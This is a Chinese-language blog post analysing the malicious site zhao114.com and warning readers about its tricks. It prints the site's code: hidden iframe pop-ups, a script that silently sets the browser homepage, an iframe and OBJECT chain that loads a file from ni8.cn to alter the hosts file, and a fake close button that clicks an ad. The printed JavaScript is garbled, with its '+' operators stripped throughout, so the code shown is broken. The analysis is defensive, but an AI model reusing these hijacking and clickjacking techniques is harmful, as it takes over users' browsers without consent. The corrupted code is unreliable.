惡意網站zhao114代碼的剖析

精通系統安全防范十大技巧·四個小麻雀迷你軟件保安全·IE與Mozilla驚現多個高危漏洞

微軟最新安全漏洞大揭秘·目前已知的38個超惡性網站名單

早就聽說了某些網站的惡意代碼，沒想到愚人節讓我碰上一回，一個朋友說道zhao114.com怎麼火爆，我就好奇看了眼，，簡單的網址站，但是彈出另外的網頁，開始沒大在意，後來發現，這個網站居然修改默認主頁、修改Hosts文件、添加桌面，另外還使用一些頁面欺騙的手法。好奇之下就分析了一下他的源碼，列出如下，請大家小心了：

1) IE防止不住彈出窗口的方法

該網站無數次采用

<iframe src="網址" frameborder="no" marginwidth="0" marginheight="0" scrolling="no"></iframe>

的方式彈出新窗口，包含廣告和病毒代碼。

2) 不提示設置首頁彈出一個js文件(setmyhome.js)。

主要代碼是下面的sethome()函數

<!--function GetCookie (name) { var arg = name "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) 1; if (i == 0) break; } return null;} function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name "=" escape (value) ((expires == null) ? "" : ("; expires=" expires.toGMTString())) ((path == null) ? "" : ("; path=" path)) ((domain == null) ? "" : ("; domain=" domain)) ((secure == true) ? "; secure" : "");} function DeleteCookie (name) { var exp = new Date(); exp.setTime (exp.getTime() - 1); // This cookie is history var cval = 0; document.cookie = name "=" cval "; expires=" exp.toGMTString();} //設置cookies時間,自己根據情況設置。var expDays = 1;//這裡設為 1 天var exp = new Date(); exp.setTime(exp.getTime() (expDays*24*60*60*1000)); function amt(){var count = GetCookie('count'); //同一ip只顯示一次//var count;//同一ip只顯示N次//alert(count);//count = null;if(count == null) {SetCookie('count','1')return 1}else{var newcount = parseInt(count) 1;if(newcount<2) count=1;SetCookie('count',newcount,exp);//DeleteCookie('count')return newcount}} function getCookieVal(offset) {var endstr = document.cookie.indexOf (";", offset);if (endstr == -1)endstr = document.cookie.length;return unescape(document.cookie.substring(offset, endstr));} function sethome(){document.links[0].style.behavior='url(#default#homepage)';document.links[0].setHomePage('http://www.zhao114.com');} if(amt()==1){sethome()}//-->

3) 強行修改hosts文件(in yan88.htm)<script src="../ads/banner.js"></script>(in banner.htm)<IFRAME border=0 marginWidth=0 marginHeight=0 src="banner_files/wo.htm" frameBorder=no width=0 scrolling=no height=0></IFRAME>(in wo.htm)<OBJECT height=0 width=0 data=http://www.ni8.cn/set/setdns.chtm></OBJECT>(in setdns.chtm)這就是代碼

4) 頁面欺騙頁面右邊出現一個浮動廣告，告訴別人有短消息，點X位置不是關閉，反而使點擊廣告了(中計)。

代碼如下：

<SPAN title=關閉>×</SPAN>

另外，他添加桌面的方式我就沒有時間研究了，留給有興趣的朋友，不過研究之前千萬小心，最好先GHOST一個備份。另外，這裡有一個目前已知的38個超惡性網站的列表，大家需要小心了。感染了的朋友，可以到3721下載一個上網助手2005迅速解決問題。